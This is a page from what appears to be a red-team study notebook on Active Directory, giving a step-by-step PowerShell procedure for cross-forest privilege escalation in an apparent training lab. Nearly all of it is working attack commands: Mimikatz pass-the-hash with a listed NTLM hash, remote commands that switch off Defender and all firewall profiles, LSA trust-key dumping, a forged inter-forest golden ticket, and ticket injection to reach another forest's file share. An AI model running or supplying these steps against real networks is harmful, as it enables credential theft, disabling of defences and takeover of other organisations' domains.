🖌️
AD-RED-TEAM
  • Active Directory Red Team
  • PowerShell Basics
    • Tips And Tricks
  • I. Active Directory Enumeration
    • User Hunting Domain Enumeration
    • Forest and Domains
    • User Enumeration
    • Groups Enumeration
    • Computers/Server Enumeration
    • Shares Enumeration
    • GP And OU Enumeration
    • ACL Domain Enumeration
    • Trust Domain Enumeration
  • II. Local Privilege Escalation
    • Lateral Movement
    • PowerUp Exploits
  • III. Domain Privilege Escalation
    • Forest Persistence – DCShadow
    • Trust Abuse - MSSQL Servers
    • Priv Esc – Across Forest using krbtgt Ticket
    • Priv Esc - Across Trusts using Trust Tickets
    • Priv Esc – DNSAdmins
    • Priv Esc - Constrained Delegation
    • Priv Esc – Unconstrained Delegation
    • Priv Esc - Targeted Kerberoasting - Set SPN
    • Targeted Kerberoasting - AS-REPs
    • Priv Esc - Kerberoast
  • IV. Domain Persistence and Dominance
    • Persistence ACLs - Security Descriptors
    • Persistence ACLs- Rights Abuse
    • Persistence ACL - AdminSDHolder
    • Persistence – Custom SSP
    • Persistence - DSRM
    • Persistence - Skeleton Key
    • Persistence - Silver Ticket
    • Persistence - Golden Ticket
  • V. Cross Trust Attacks
  • VI. Forest Persistence and Dominance
  • VII. Defenses – Monitoring
  • VIII. Defenses and bypass – Architecture and Work Culture Changes
  • IX. Defenses and Bypass – Deception
  • X. Defenses and Bypass – PowerShell
  • New Server
    • Move Lat-AppLocker
    • Move Lat-Invoke-Command
Powered by GitBook
On this page

Was this helpful?

  1. III. Domain Privilege Escalation

Priv Esc – Across Forest using krbtgt Ticket

Across Forest using krbtgt Ticket

#This is for External Trust Forrest
#You need to have the hashes  of a domain admin

#How to Enumerate Trust?
#Open Powershell as low user level
import-module .\PowerView.ps1
Get-NetDomainTrust



#Open PowerShell as an Admin domain
#Open Powershell as a Local Admin and run the hashes of a Domain Admin:
import-module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'

#Create new session and get the hashes of the trusted key between current domain and the external domain
$sess = New-PSSession -ComputerName dcorp-dc
#disable firewalls

Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess

Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
#Enter Mimikatz in the session
Invoke-Command -Session $sess -FilePath c:\AD\Tools\Invoke-mimikatz.ps1
#Enter Session
Enter-PSSession $sess

#Get the trusted key hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
#We found the trusted external key which is between current domain (moneycorp.local) and ecorp


#Exit the session to dcorp-dc
exit

#Get the current Domain SID: If you need it, this needs to be run from a low domain priv user
import-module powerview.ps1
Get-DomainSID


#Get the TGS from the Domain Admin Powershell opened before.
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:b54826de14cfee5bfddcd8b5c45f6a4b /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'



#Get TGS for a service.
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/eurocorp-dc.eurocorp.local




#Use the TGS to access the targeted service.

 .\kirbikator.exe lsa .\CIFS.eurocorp-dc.eurocorp.local.kirbi
.

#Test Acess:
ls \\eurocorp-dc.eurocorp.local\SharedWithDCorp

#See Cached Tickets
klist
PreviousTrust Abuse - MSSQL ServersNextPriv Esc - Across Trusts using Trust Tickets

Last updated 4 years ago

Was this helpful?